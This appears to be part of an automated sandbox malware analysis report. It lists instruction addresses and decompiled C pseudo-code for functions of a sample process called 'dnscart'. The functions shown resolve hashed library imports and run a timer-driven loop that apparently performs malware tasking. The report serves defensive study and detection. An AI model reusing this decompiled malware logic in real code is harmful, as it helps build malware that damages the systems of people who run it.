0x001f4a9a
0x001f4aa1
0x00000000
0x00000000
0x00000000
0x001f4aa3
0x001f4aa6
0x001f4aa9
0x001f4ab2
0x00000000
0x001f4ab4
0x00000000
0x001f4ab4
0x001f4ab2
0x001f4a3d
0x001f4a43
0x001f4a4a
0x001f4ab9
0x001f4ab9
0x001f4abf
0x001f4b1e
0x001f4b2a
0x00000000
0x001f4ac1
0x001f4ac1
0x001f4ac4
0x001f4ac7
0x001f4b08
0x001f4b16
0x001f4b2d
0x001f4b2f
0x00000000
0x001f4b31
0x001f4b3c
0x001f4b3f
0x001f4b45
0x001f4b48
0x001f4b4f
0x00000000
0x00000000
0x00000000
0x00000000
0x001f4b4f
0x001f4ac9
0x001f4ac9
0x001f4ac9
0x001f4ad0
0x001f4ad3
0x001f5281
0x001f4ac7
0x001f4a54
0x001f4b55
0x00000000
0x001f4b55
0x001f4a4a
0x001f4a3b
0x001f4a0e
0x001f4913
0x001f4913
0x001f4919
0x001f49bd
0x001f49bd
0x001f49c2
0x001f49c3
0x001f49c4
0x001f49cd
0x001f49db
0x001f49e1
0x001f49e4
0x001f49e7
0x001f49e9
0x00000000
0x001f49ef
0x001f49f2
0x001f49f8
0x00000000
0x001f49f8
0x001f491f
0x001f491f
0x001f491f
0x001f4925
0x001f4984
0x001f4990
0x00000000
0x001f4927
0x001f4927
0x001f492a
0x001f492d
0x001f496e
0x001f497c
0x001f4993
0x001f4995
0x00000000
0x001f4997
0x001f49a2
0x001f49a5
0x001f49ae
0x001f49b1
0x001f49b7
0x00000000
0x00000000
0x00000000
0x00000000
0x001f49b7
0x001f492f
0x001f492f
0x001f492f
0x001f4936
0x001f4939
0x001f5283
0x001f492d
0x001f4925
0x001f4919
0x001f48ea
0x001f4fdb
0x001f4fe1
0x001f4fe4
0x001f3184
0x001f3188
0x001f322a
0x001f3233
0x001f323c
0x001f3245
0x001f324a
0x00000000
0x001f3250
0x001f325b
0x001f325e
0x001f3265
0x001f37d5
0x001f37dc
0x001f380e
0x001f3913
0x001f3925
0x001f3929
0x001f3a57
0x001f3a5c
0x001f3a5d
0x001f3a5e
0x001f3a5f
0x001f3a60
0x001f3a61
0x001f3a62
0x001f3a6c
0x001f3a7b
0x001f3a7d
0x001f3a80
0x001f3a92
0x001f3a99
0x001f3aa3
0x001f3ba5
0x00000000
0x001f3aa9
0x001f3aa9
0x001f3aad
0x001f3b4f
0x001f3b55
0x001f3b5e
0x001f3b61
0x001f3b6a
0x001f3b6f
0x00000000
0x001f3b75
0x001f3b8d
0x001f3b93
0x001f3a8f
0x00000000
0x001f3a8f
0x001f3ab3
0x001f3ab3
0x001f3ab3
0x001f3ab9
0x001f3b18
0x001f3b24
0x00000000
0x001f3abb
0x001f3abb
0x001f3abe
0x001f3ac1
0x001f3b02
0x001f3b10
0x001f3b27
0x001f3b29
0x00000000
0x001f3b2b
0x001f3b39
0x001f3b42
0x001f3b49
0x00000000
0x00000000
0x00000000
0x00000000
0x001f3b49
0x001f3ac3
0x001f3ac3
0x001f3ac3
0x001f3aca
0x001f3acd
0x001f3acd
0x001f3ac1
0x001f3ab9
0x001f3aad
0x001f392f
0x001f392f
0x001f3932
0x001f393c
0x001f39e7
0x001f39ea
0x001f3a04
0x001f3a0b
0x001f3a17
0x001f3a1d
0x001f3a1d
0x001f3a27
0x001f3a29
0x001f3a2e
0x00000000
0x001f3a34
0x001f3a34
0x001f3a39
0x001f3a48
0x001f3a4e
0x001f3922
0x00000000
0x001f3922
0x001f3942
0x001f3942
0x001f3942
0x001f3948
0x001f39a7
0x001f39b3
0x00000000
0x001f394a
0x001f394a
0x001f394d
0x001f3950
0x001f3991
0x001f399f
0x001f39b6
0x001f39b8
0x00000000
0x001f39ba
0x001f39c8
0x001f39d1
0x001f39d7
0x001f39e1
0x00000000
0x00000000
0x00000000
0x00000000
0x001f39e1
0x001f3952
0x001f3952
0x001f3952
0x001f3959
0x001f395c
0x001f395c
0x001f3950
0x001f3948
0x001f393c
0x001f3814
0x001f3823
0x001f3831
0x001f3844
0x001f384c
0x001f384e
0x001f385f
0x001f3868
0x001f386e
0x001f3870
0x001f3873
0x001f3885
0x001f3891
0x001f3897
0x001f389a
0x001f3882
0x001f3882
0x001f38aa
0x001f38b6
0x001f38bc
0x001f38bf
0x001f38a7
0x001f38a7
0x001f38cf
0x001f38db
0x001f38e1
0x001f38e4
0x001f38cc
0x001f38cc
0x001f38f4
0x001f3900
0x001f3906
0x001f3909
0x001f38f1
0x001f38f1
0x001f3bad
0x001f3bbe
0x001f3bc5
0x00000000
0x001f3bcb
0x001f3bdc
0x001f3bdf
0x001f3be1
0x001f3be9
0x001f3bf8
0x001f3bfd
0x001f3c02
0x001f3c0d
0x001f3c1c
0x001f3c21
0x001f3c26
0x001f3c31
0x001f3c40
0x001f3c42
0x001f3c45
0x001f3c57
0x001f3c85
0x001f3c54
0x001f3c54
0x001f3c8e
0x001f3c98
0x001f3ca7
0x001f3caa
0x001f3cba
0x001f3cbd
0x001f3cc8
0x001f3cda
0x001f3cf0
0x001f3d08
0x001f3d0e
0x001f3d17
0x001f3cd4
0x001f3cd7
0x001f3cd7
0x001f3d2a
0x001f3d59
0x001f3d60
0x001f3d72
0x001f3d7b
0x001f3d82
0x00000000
0x00000000
0x001f3d88
0x001f3d98
0x001f3d9f
0x001f3dad
0x001f3dbd
0x001f3dc3
0x001f3dca
0x001f3dcd
0x001f3df2
0x001f3e09
0x001f3e0b
0x001f3ddb
0x001f3dde
0x001f3dec
0x001f3dec
0x001f3e14
0x001f3e6e
0x001f3e75
0x001f3e86
0x001f3e91
0x001f3e9a
0x001f3e9a
0x001f3ea3
0x001f3ea9
0x001f3ec0
0x001f3ece
0x001f3edc
0x001f3ef1
0x001f3f28
0x001f3ef3
0x001f3eff
0x001f3f0a
0x001f3f13
0x001f3f13
0x001f3eba
0x001f3eba
0x001f3f32
0x001f3f40
0x001f3f4f
0x001f3e16
0x001f3e1f
0x001f3e26
0x001f3e2f
0x001f3e34
0x001f3e3c
0x001f3e49
0x001f3e4e
0x001f3e51
0x001f3e51
0x001f3e56
0x00000000
0x001f3da1
0x001f3d69
0x001f3d6f
0x00000000
0x001f3d6f
0x00000000
0x001f3d9f
0x001f3f63
0x001f445e
0x001f3bb5
0x001f3bbb
0x00000000
0x001f3f69
0x001f3f69
0x001f3f70
0x001f3f87
0x001f3f8a
0x001f3f91
0x001f439a
0x001f43a4
0x001f43a7
0x001f43ae
0x001f43e3
0x001f43ed
0x001f43fd
0x001f440c
0x001f4420
0x001f443a
0x001f444a
0x001f4459
0x001f445b
0x00000000
0x001f43b0
0x001f43b0
0x001f43b0
0x001f43b7
0x001f43ba
0x001f5289
0x001f3f97
0x001f3f97
0x001f3f9b
0x001f4136
0x001f414c
0x001f4154
0x001f415b
0x001f4173
0x001f417a
0x001f41a2
0x001f41a8
0x001f41ab
0x001f41ae
0x001f415d
0x001f4163
0x001f416e
0x001f416e
0x001f41b7
0x001f41c0
0x001f41c2
0x001f41c8
0x001f41cb
0x001f41ce
0x001f41d0
0x00000000
0x001f41d6
0x001f41da
0x001f41fd
0x001f4229
0x001f422c
0x001f422c
0x001f4233
0x001f4236
0x001f423c
0x001f42e0
0x001f42e0
0x001f42e5
0x001f42e6
0x001f42e7
0x001f42f0
0x001f42fe
0x001f4304
0x001f4307
0x001f430a
0x001f430c
0x00000000
0x001f4312
0x001f4322
0x001f432c
0x001f4343
0x001f432e
0x001f433b
0x001f433b
0x001f4353
0x001f435a
0x001f4368
0x001f436e
0x001f4377
0x001f4379
0x001f4385
0x00000000
0x001f4385
0x001f4242
0x001f4242
0x001f4242
0x001f4248
0x001f42a7
0x001f42b3
0x00000000
0x001f424a
0x001f424a
0x001f424d
0x001f4250
0x001f4291
0x001f429f
0x001f42b6
0x001f42b8
0x00000000
0x001f42ba
0x001f42c5
0x001f42c8
0x001f42ce
0x001f42d1
0x001f42da
0x00000000
0x00000000
0x00000000
0x00000000
0x001f42da
0x001f4252
0x001f4252
0x001f4252
0x001f4259
0x001f425c
0x001f528b
0x001f4250
0x001f4248
0x001f4205
0x001f4205
0x001f4205
0x001f420c
0x001f420f
0x001f528d
0x001f41dc
0x001f41e5
0x001f41ee
0x001f41f1
0x00000000
0x001f41f1
0x001f41da
0x001f3fa1
0x001f3faa
0x001f411a
0x001f4121
0x001f412a
0x001f4133
0x00000000
0x001f3fb0
0x001f3fb0
0x001f3fc7
0x001f3fcf
0x001f3fd6
0x001f3ffa
0x00000000
0x001f3ffc
0x001f3ffc
0x001f4003
0x001f4021
0x001f402b
0x001f4031
0x001f4034
0x001f403b
0x00000000
0x00000000
0x00000000
0x001f403d
0x001f4040
0x001f4043
0x001f404c
0x00000000
0x001f404e
0x00000000
0x001f404e
0x001f404c
0x001f3fd8
0x001f3fdb
0x001f3fde
0x001f3fe5
0x001f4053
0x001f4053
0x001f4059
0x001f40b8
0x001f40c4
0x00000000
0x001f405b
0x001f405b
0x001f405e
0x001f4061
0x001f40a2
0x001f40b0
0x001f40c7
0x001f40c9
0x00000000
0x001f40cb
0x001f40d1
0x001f40d9
0x001f40df
0x001f40e2
0x001f40e9
0x00000000
0x00000000
0x00000000
0x00000000
0x001f40e9
0x001f4063
0x001f4063
0x001f4063
0x001f406a
0x001f406d
0x001f528f
0x001f4061
0x001f3fef
0x001f40ef
0x00000000
0x001f40ef
0x001f3fe5
0x001f3fd6
0x001f3faa
0x001f3f9b
0x001f3f91
0x001f3d35
0x001f3d35
0x001f3d35
0x001f3d3c
0x001f3d3f
0x001f3d3f
0x001f3d2a
0x001f3bc5
0x001f37de
0x001f37de
0x001f37de
0x001f37e5
0x001f37e8
0x001f37e8
0x001f326b
0x001f326b
0x001f3274
0x001f331b
0x001f3326
0x001f332c
0x001f3334
0x001f3339
0x00000000
0x001f333f
0x001f333f
0x001f3351
0x001f3355
0x001f34f8
0x001f3515
0x001f3520
0x001f352e
0x001f3554
0x001f3558
0x001f367b
0x001f367f
0x00000000
0x001f3685
0x001f3685
0x001f3685
0x001f368b
0x001f36ad
0x001f36ad
0x001f36b3
0x001f3711
0x001f3727
0x001f3713
0x001f3719
0x001f3719
0x001f3736
0x001f3773
0x001f3738
0x001f3746
0x001f375c
0x001f3748
0x001f374e
0x001f374e
0x001f3768
0x001f3768
0x001f377f
0x001f378b
0x001f378f
0x001f3793
0x001f37a2
0x001f37a4
0x001f37b0
0x001f37b6
0x001f37bc
0x001f37c8
0x00000000
0x001f36b5
0x001f36b8
0x001f36bb
0x001f36dd
0x001f36dd
0x001f36e4
0x001f36e7
0x001f36bd
0x001f36bd
0x001f36bd
0x001f36c4
0x001f36c7
0x001f36c7
0x001f36bb
0x001f368d
0x001f368d
0x001f368d
0x001f3694
0x001f3697
0x001f3697
0x001f368b
0x001f3568
0x001f3568
0x001f356c
0x001f360e
0x001f3617
0x001f3620
0x001f3629
0x001f362c
0x001f362e
0x00000000
0x001f3634
0x001f3634
0x001f3634
0x001f363a
0x001f3662
0x001f366a
0x001f3670
0x001f3673
0x00000000
0x001f363c
0x001f363c
0x001f363c
0x001f3643
0x001f3646
0x001f3646
0x001f363a
0x001f3572
0x001f3572
0x001f3572
0x001f3578
0x001f35d7
0x001f35e3
0x00000000
0x001f357a
0x001f357a
0x001f357d
0x001f3580
0x001f35c1
0x001f35cf
0x001f35e6
0x001f35e8
0x00000000
0x001f35ea
0x001f35f8
0x001f3601
0x001f3608
0x00000000
0x00000000
0x00000000
0x00000000
0x001f3608
0x001f3582
0x001f3582
0x001f3582
0x001f3589
0x001f358c
0x001f358c
0x001f3580
0x001f3578
0x001f356c
0x001f3530
0x001f3530
0x001f3530
0x001f3537
0x001f353a
0x001f353a
0x001f335b
0x001f335f
0x001f343f
0x001f343f
0x001f3445
0x001f34b1
0x001f34bd
0x00000000
0x001f3447
0x001f3447
0x001f344a
0x001f344d
0x001f3499
0x001f34a4
0x001f34c0
0x001f34c2
0x00000000
0x00000000
0x00000000
0x00000000
0x001f344f
0x001f344f
0x001f344f
0x001f3456
0x001f3459
0x001f3459
0x001f344d
0x001f3365
0x001f3365
0x001f3369
0x001f340b
0x001f341a
0x001f3426
0x001f342f
0x001f3434
0x00000000
0x001f343a
0x001f34c8
0x001f334b
0x001f334e
0x00000000
0x001f334e
0x001f336f
0x001f336f
0x001f336f
0x001f3375
0x001f33d4
0x001f33e0
0x00000000
0x001f3377
0x001f3377
0x001f337a
0x001f337d
0x001f33be
0x001f33cc
0x001f33e3
0x001f33e5
0x00000000
0x001f33e7
0x001f33f5
0x001f33fe
0x001f3405
0x00000000
0x00000000
0x00000000
0x00000000
0x001f3405
0x001f337f
0x001f337f
0x001f337f
0x001f3386
0x001f3389
0x001f3389
0x001f337d
0x001f3375
0x001f3369
0x001f335f
0x001f3355
0x001f327a
0x001f327a
0x001f327a
0x001f3280
0x001f32df
0x001f32eb
0x00000000
0x001f3282
0x001f3282
0x001f3285
0x001f3288
0x001f32c9
0x001f32d7
0x001f32ee
0x001f32f0
0x00000000
0x001f32f2
0x001f3300
0x001f3309
0x001f3315
0x00000000
0x00000000
0x00000000
0x00000000
0x001f3315
0x001f328a
0x001f328a
0x001f328a
0x001f3291
0x001f3294
0x001f3294
0x001f3288
0x001f3280
0x001f3274
0x001f3265
0x001f318e
0x001f318e
0x001f318e
0x001f3194
0x001f31f3
0x001f31ff
0x00000000
0x001f3196
0x001f3196
0x001f3199
0x001f319c
0x001f31dd
0x001f31eb
0x001f3202
0x001f3204
0x00000000
0x001f3206
0x001f3214
0x001f321d
0x001f3224
0x00000000
0x00000000
0x00000000
0x00000000
0x001f3224
0x001f319e
0x001f319e
0x001f319e
0x001f31a5
0x001f31a8
0x001f31a8
0x001f319c
0x001f3194
0x001f4fea
0x001f4fed
0x001f4ff0
0x001f5253
0x001f5253
0x001f525a
0x001f525d
0x001f4ff6
0x001f4ff6
0x001f4fff
0x001f50a6
0x001f50b1
0x001f50b7
0x001f50bf
0x001f50c2
0x001f50c4
0x00000000
0x001f50ca
0x001f50ca
0x001f50dc
0x001f50e0
0x00000000
0x001f50e6
0x001f50ea
0x001f51c1
0x001f51c1
0x001f51c7
0x001f5226
0x001f5232
0x00000000
0x001f51c9
0x001f51c9
0x001f51cc
0x001f51cf
0x001f5210
0x001f521e
0x001f5235
0x001f5237
0x00000000
0x00000000
0x00000000
0x00000000
0x001f51d1
0x001f51d1
0x001f51d1
0x001f51d8
0x001f51db
0x001f5275
0x001f51cf
0x001f50f0
0x001f50f0
0x001f50f4
0x001f5196
0x001f519f
0x001f51ab
0x001f51b4
0x001f51b9
0x00000000
0x001f51bf
0x001f5239
0x001f5242
0x001f524b
0x001f50d6
0x001f50d9
0x00000000
0x001f50d9
0x001f50fa
0x001f50fa
0x001f50fa
0x001f5100
0x001f515f
0x001f516b
0x00000000
0x001f5102
0x001f5102
0x001f5105
0x001f5108
0x001f5149
0x001f5157
0x001f516e
0x001f5170
0x00000000
0x001f5172
0x001f5180
0x001f5189
0x001f5190
0x00000000
0x00000000
0x00000000
0x00000000
0x001f5190
0x001f510a
0x001f510a
0x001f510a
0x001f5111
0x001f5114
0x001f5277
0x001f5108
0x001f5100
0x001f50f4
0x001f50ea
0x001f50e0
0x001f5005
0x001f5005
0x001f5005
0x001f500b
0x001f506a
0x001f5076
0x00000000
0x001f500d
0x001f500d
0x001f5010
0x001f5013
0x001f5054
0x001f5062
0x001f5079
0x001f507b
0x00000000
0x001f507d
0x001f508b
0x001f5094
0x001f50a0
0x00000000
0x00000000
0x00000000
0x00000000
0x001f50a0
0x001f5015
0x001f5015
0x001f5015
0x001f501c
0x001f501f
0x001f5279
0x001f5013
0x001f500b
0x001f4fff
0x001f4ff0
0x001f4fe4
0x001f48e8
0x00000000
0x00000000
0x00000000
0x001f4477
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001f4de4
0x00000000
0x00000000
0x00000000
0x00000000
0x001f2f58
0x001f5291
0x001f5291
0x001f5296
0x001f5297
0x00000000
0x001f5297
0x001f5521
0x001f5525

Strings

5, xrefs: 001F2F3E

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F214F, Relevance: 1.5, APIs: 1, Instructions: 7

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 001F2151

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F1BE0, Relevance: .0, Instructions: 38

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F9CB8, Relevance: 36.2, APIs: 24, Instructions: 176
library

C-Code - Quality: 40%

			E001F9CB8(void* __ecx, void* __edx, void* __edi) {
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t35;
				struct HINSTANCE__* _t41;
				struct HINSTANCE__* _t47;
				struct HINSTANCE__* _t53;
				struct HINSTANCE__* _t59;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t106;

				_t96 = __edi;
				L001F1830(__ecx, __edx);
				_t97 =  *(_t106 - 4);
				_t17 = LoadLibraryW(_t97);
				_push(0x1fc040);
				_push(0x30116feb);
				_push(0x21);
				L001F1B10(_t17, 0x1f1040, _t96, _t97);
				HeapFree(GetProcessHeap(), 0, _t97);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L001F1830(0x1f1568, 0xc);
				_t98 =  *(_t106 - 4);
				_t23 = LoadLibraryW(_t98);
				_push(0x1fc0c8);
				_push(0x1f598772);
				_push(1);
				L001F1B10(_t23, 0x1f1024, _t96, _t98);
				HeapFree(GetProcessHeap(), 0, _t98);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L001F1830(0x1f1574, 0xc);
				_t99 =  *(_t106 - 4);
				_t29 = LoadLibraryW(_t99);
				_push(0x1fc214);
				_push(0x41696925);
				_push(2);
				L001F1B10(_t29, 0x1f1028, _t96, _t99);
				HeapFree(GetProcessHeap(), 0, _t99);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L001F1830(0x1f1580, 0xc);
				_t100 =  *(_t106 - 4);
				_t35 = LoadLibraryW(_t100);
				_push(0x1fc0c4);
				_push(0x37dff52a);
				_push(1);
				L001F1B10(_t35, 0x1f100c, _t96, _t100);
				HeapFree(GetProcessHeap(), 0, _t100);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L001F1830(0x1f1550, 0xc);
				_t101 =  *(_t106 - 4);
				_t41 = LoadLibraryW(_t101);
				_push(0x1fc0cc);
				_push(0x14c87d5f);
				_push(1);
				L001F1B10(_t41, 0x1f10c4, _t96, _t101);
				HeapFree(GetProcessHeap(), 0, _t101);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L001F1830(0x1f1544, 0xc);
				_t102 =  *(_t106 - 4);
				_t47 = LoadLibraryW(_t102);
				_push(0x1fc21c);
				_push(0x786d5b64);
				_push(2);
				L001F1B10(_t47, 0x1f10c8, _t96, _t102);
				HeapFree(GetProcessHeap(), 0, _t102);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L001F1830(0x1f1598, 0xc);
				_t103 =  *(_t106 - 4);
				_t53 = LoadLibraryW(_t103);
				_push(0x1fc230);
				_push(0x53973344);
				_push(0xe);
				L001F1B10(_t53, 0x1f1220, _t96, _t103);
				HeapFree(GetProcessHeap(), 0, _t103);
				_push(_t106 - 4);
				_push(0x4b85ca91);
				L001F1830(0x1f158c, 0xc);
				_t104 =  *(_t106 - 4);
				_t59 = LoadLibraryW(_t104);
				_push(0x1fc224);
				_push(0x221bf2d2);
				_push(3);
				L001F1B10(_t59, 0x1f1214, _t96, _t104);
				HeapFree(GetProcessHeap(), 0, _t104);
				return L001F92F0(_t59);
			}

0x001f9cb8
0x001f9cb8
0x001f9cbd
0x001f9cc4
0x001f9cca
0x001f9ccf
0x001f9cd4
0x001f9cdd
0x001f9cef
0x001f9cfd
0x001f9cfe
0x001f9d08
0x001f9d0d
0x001f9d14
0x001f9d1a
0x001f9d1f
0x001f9d24
0x001f9d2d
0x001f9d3f
0x001f9d4d
0x001f9d4e
0x001f9d58
0x001f9d5d
0x001f9d64
0x001f9d6a
0x001f9d6f
0x001f9d74
0x001f9d7d
0x001f9d8f
0x001f9d9d
0x001f9d9e
0x001f9da8
0x001f9dad
0x001f9db4
0x001f9dba
0x001f9dbf
0x001f9dc4
0x001f9dcd
0x001f9ddf
0x001f9ded
0x001f9dee
0x001f9df8
0x001f9dfd
0x001f9e04
0x001f9e0a
0x001f9e0f
0x001f9e14
0x001f9e1d
0x001f9e2f
0x001f9e3d
0x001f9e3e
0x001f9e48
0x001f9e4d
0x001f9e54
0x001f9e5a
0x001f9e5f
0x001f9e64
0x001f9e6d
0x001f9e7f
0x001f9e8d
0x001f9e8e
0x001f9e98
0x001f9e9d
0x001f9ea4
0x001f9eaa
0x001f9eaf
0x001f9eb4
0x001f9ebd
0x001f9ecf
0x001f9edd
0x001f9ede
0x001f9ee8
0x001f9ef0
0x001f9ef4
0x001f9efa
0x001f9eff
0x001f9f04
0x001f9f0d
0x001f9f1f
0x001f9f2e

APIs

LoadLibraryW.KERNEL32(?), ref: 001F9CC4
GetProcessHeap.KERNEL32(00000000,?), ref: 001F9CE8
HeapFree.KERNEL32(00000000), ref: 001F9CEF
LoadLibraryW.KERNEL32(?), ref: 001F9D14
GetProcessHeap.KERNEL32(00000000,?), ref: 001F9D38
HeapFree.KERNEL32(00000000), ref: 001F9D3F
LoadLibraryW.KERNEL32(?), ref: 001F9D64
GetProcessHeap.KERNEL32(00000000,?), ref: 001F9D88
HeapFree.KERNEL32(00000000), ref: 001F9D8F
LoadLibraryW.KERNEL32(?), ref: 001F9DB4
GetProcessHeap.KERNEL32(00000000,?), ref: 001F9DD8
HeapFree.KERNEL32(00000000), ref: 001F9DDF
LoadLibraryW.KERNEL32(?), ref: 001F9E04
GetProcessHeap.KERNEL32(00000000,?), ref: 001F9E28
HeapFree.KERNEL32(00000000), ref: 001F9E2F
LoadLibraryW.KERNEL32(?), ref: 001F9E54
GetProcessHeap.KERNEL32(00000000,?), ref: 001F9E78
HeapFree.KERNEL32(00000000), ref: 001F9E7F
LoadLibraryW.KERNEL32(?), ref: 001F9EA4
GetProcessHeap.KERNEL32(00000000,?), ref: 001F9EC8
HeapFree.KERNEL32(00000000), ref: 001F9ECF
LoadLibraryW.KERNEL32(?), ref: 001F9EF4
GetProcessHeap.KERNEL32(00000000,?), ref: 001F9F18
HeapFree.KERNEL32(00000000), ref: 001F9F1F

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F8E20, Relevance: 21.2, APIs: 14, Instructions: 155
string

C-Code - Quality: 89%

			E001F8E20(void* __ebx, void* __edx, void* __edi) {
				void* _v16;
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _v44;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				void* _v84;
				void* _v92;
				signed int _t28;
				long _t29;

				_t28 = GetTickCount();
				if(_t28 <  *0x1fc278) {
					L24:
					return _t28;
				} else {
					_t29 =  *0x1fc280; // 0x0
					_t28 = _t29 - 1;
					if(_t28 > 3) {
						goto L24;
					} else {
						switch( *((intOrPtr*)(_t28 * 4 +  &M001F9094))) {
							case 0:
								 *0x1fc280 = 2;
								return _t28;
								goto L25;
							case 1:
								 *0x1fc280 = 0;
								__eax = L001F9670();
								__eax = __eax;
								if(__eax == 0) {
									 *0x1fc280 = 3;
									_pop(__esi);
									return __eax;
								} else {
									if(__eax != 0) {
										goto L24;
									} else {
										__eax = SetEvent( *0x1fc29c);
										_pop(__esi);
										return __eax;
									}
								}
								goto L25;
							case 2:
								 *0x1fc280 = 0;
								 *0x1fc294 = 0x1f1270;
								 *0x1fc298 = 0x1f1270;
								__eax = L001F2310();
								__eax =  *0x1fc02c; // 0x1f12f8
								 *0x1fc26c = __eax;
								__eax =  *0x1fc030; // 0x6a
								 *0x1fc268 = 0x1fc2a8;
								 *0x1fc270 = __eax;
								 *0x1fc280 = 4;
								_pop(__esi);
								return __eax;
								goto L25;
							case 3:
								__ecx =  &_v28;
								 *0x1fc280 = 0;
								__eax = L001F8BF0( &_v28);
								__ecx =  &_v36;
								__eax = L001F8D90(__eax,  &_v36);
								__eax =  *0x1fcbd0; // 0x0
								_push(0x1fc2a8);
								_v32 = __eax;
								_v44 = 0x1fc2a8;
								_v44 =  *0x1fc130();
								__eax =  *0x1fc2a4; // 0x0
								_v52 = __eax;
								do {
									__ecx =  &_v24;
									__esi = 0xdbba0;
									__eax = L001F8960(__edx, 0xdbba0);
									__ecx =  &_v16;
									__eax = L001FA7F0(__edx, 0xdbba0);
									__edx =  &_v52;
									__ecx =  &_v84;
									if(L001F9FD0(__ebx, __ecx, __edx) != 0) {
										__eax =  &_v92;
										_push( &_v92);
										__eax =  &_v84;
										_push(__eax);
										__eax = L001F8560(__eax, __ecx);
										__esp = __esp + 8;
										if(__eax == 0) {
											__eax =  *0x1fc298; // 0x0
											__esi = 0x7530;
											__eax = __eax + 8;
											 *0x1fc298 = __eax;
											 *0x1fc298 = __eax;
										} else {
											__eax = L001F99F0(__eax, __ecx, __edi);
											__ecx = 0;
											__eax = E001F88F0(0);
											__ecx = 0;
											__eax = E001FA7A0(0);
											__edx =  &_v76;
											__ecx =  &_v92;
											if(L001FA1D0( &_v92, __edx) != 0) {
												__eax = L001F1750(__edi);
												__edx = _v72;
												if(__edx != 0) {
													__ecx = _v76;
													__eax = L001F9AE0(__eax, _v76, __edx);
												}
												__eax = L001F1750(__edi);
												__edx = _v64;
												if(__edx != 0) {
													__ecx = _v68;
													__eax = L001F89D0(__edx, __esi);
													__esi = 0;
												}
												__eax = L001F1750(__edi);
												__edx = _v56;
												if(__edx != 0) {
													__ecx = _v60;
													__eax = L001FA860(__edx, __esi);
													__esi = 0;
												}
											}
											GetProcessHeap() = HeapFree(__eax, 0, _v92);
										}
										GetProcessHeap() = HeapFree(__eax, 0, _v84);
									}
									GetProcessHeap() = HeapFree(__eax, 0, _v24);
									GetProcessHeap() = HeapFree(__eax, 0, _v16);
								} while (__esi == 0);
								__eax = GetTickCount();
								__eax = __eax + __esi;
								 *0x1fc280 = 4;
								 *0x1fc278 = __eax;
								GetProcessHeap() = HeapFree(__eax, 0, _v32);
								goto L24;
						}
					}
				}
				L25:
			}

0x001f8e2a
0x001f8e36
0x001f908d
0x001f9091
0x001f8e3c
0x001f8e3c
0x001f8e41
0x001f8e45
0x00000000
0x001f8e4b
0x001f8e4b
0x00000000
0x001f8e52
0x001f8e60
0x00000000
0x00000000
0x001f8e63
0x001f8e6d
0x001f8e72
0x001f8e75
0x001f8e91
0x001f8e9b
0x001f8e9f
0x001f8e77
0x001f8e78
0x00000000
0x001f8e7e
0x001f8e84
0x001f8e8a
0x001f8e8e
0x001f8e8e
0x001f8e78
0x00000000
0x00000000
0x001f8ea2
0x001f8eac
0x001f8eb6
0x001f8ec0
0x001f8ec5
0x001f8eca
0x001f8ecf
0x001f8ed4
0x001f8ede
0x001f8ee3
0x001f8eed
0x001f8ef1
0x00000000
0x00000000
0x001f8ef4
0x001f8ef8
0x001f8f02
0x001f8f07
0x001f8f0b
0x001f8f10
0x001f8f15
0x001f8f1a
0x001f8f1e
0x001f8f2c
0x001f8f30
0x001f8f38
0x001f8f40
0x001f8f40
0x001f8f44
0x001f8f49
0x001f8f4e
0x001f8f52
0x001f8f57
0x001f8f5b
0x001f8f66
0x001f8f6c
0x001f8f70
0x001f8f71
0x001f8f75
0x001f8f76
0x001f8f7b
0x001f8f80
0x001f9001
0x001f9006
0x001f900b
0x001f900e
0x001f901d
0x001f8f82
0x001f8f82
0x001f8f87
0x001f8f89
0x001f8f8e
0x001f8f90
0x001f8f95
0x001f8f99
0x001f8fa4
0x001f8fa6
0x001f8fab
0x001f8fb1
0x001f8fb3
0x001f8fb7
0x001f8fb7
0x001f8fbc
0x001f8fc1
0x001f8fc7
0x001f8fc9
0x001f8fcd
0x001f8fd2
0x001f8fd2
0x001f8fd4
0x001f8fd9
0x001f8fdf
0x001f8fe1
0x001f8fe5
0x001f8fea
0x001f8fea
0x001f8fdf
0x001f8ff9
0x001f8ff9
0x001f902f
0x001f902f
